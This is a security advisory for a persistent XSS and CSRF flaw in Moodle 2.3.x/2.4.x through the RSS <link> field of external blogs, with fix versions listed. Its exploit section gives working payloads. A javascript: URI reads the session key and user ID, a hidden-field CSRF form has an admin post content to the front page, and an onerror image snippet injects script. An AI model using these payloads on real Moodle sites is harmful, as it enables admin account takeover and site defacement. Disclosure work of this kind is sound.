Moodle 2.3.9 / 2.4.9 Javascript Insertion

2013-09-10 / 2013-10-20
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

####################################################################### Ciaran McNally Application: Moodle http://download.moodle.org/ Versions: <= 2.3.9, 2.4.6 Platforms: Windows, Mac, Linux Bug: Persistant XSS / CSRF Exploitation: WEB Date: 9 September 2013. Author: Ciaran McNally Web: http://makthepla.net/blog/=/moodle-2-account-takeover My Twitter: https://twitter.com/ciaranmak ####################################################################### 1) Bug. 2) The exploit. 3) Fix. ####################################################################### Moodle is a Course Management System (CMS), also known as a Learning Management System (LMS) or a Virtual Learning Environment (VLE). It is a Free web application that educators can use to create effective online learning sites. ####################################################################### ====== 1) Bug ====== At the following URL as a student, http://server/blog/external_blog_edit.php It is possible to remotely add an rss blog. The <link> parameter in an rss feed is vulnerable to javascript injection. This blog post is viewable by everyone on moodle and you can link to it directly. Upon clicking the "Link to original blog entry" link, you get javascript execution. In moodle the "sesskey" parameter holds the session key used to prevent csrf, this isn't unique for every form once logged in so many forms can be submitted using this item. It is available on every page which makes xss quite dangerous in this case. ####################################################################### ============== 2) The exploit ============== Using a link value of <link>javascript:prompt(document.domain);</link> This will display a demonstrative prompt as expected. For a live example you can remotely include my blog rss feed. http://makthepla.net/Rss/ My moodle blog post has a <link> value of the following. javascript:alert("Session key = "+M.cfg.sesskey+"\nUser ID = "+window.location.search.split("=")[1]); This displays the session key and the current users id. If you can get an admin to click the link and submit the following form trough javascript, you can post xss onto the main login page of your victim moodle site. <input type="hidden" name="id" value="1"> <input type="hidden" name="sr" value="0"> <input type="hidden" name="sesskey" value="x"> <input type="hidden" name="_qf__editsection_form" value="1"> <input type="hidden" name="mform_isexpanded_id_generalhdr" value="1"> <input type="hidden" name="userdefaultname" value="1"> <input type="hidden" name="summary_editor[text]" value="THE FRONT PAGE DATA AND/OR XSS"> <input type="hidden" name="summary_editor[format]" value="1"> <input type="hidden" name="summary_editor[itemid]" value=""> <input type="hidden" name="submitbutton" value="Save+changes"> You can read more about this on the original blog post. You can get xss on the main login easily using html such as <img src=x onerror=XSS> when posting as an admin via csrf. ####################################################################### ====== 3) Fix ====== https://tracker.moodle.org/browse/MDL-41623 (This requires a login to view) Upgrade to versions 2.3.9, 2.4.6 and 2.5.2. ####################################################################### -- maK :)

References:

http://makthepla.net/blog/=/moodle-2-account-takeover


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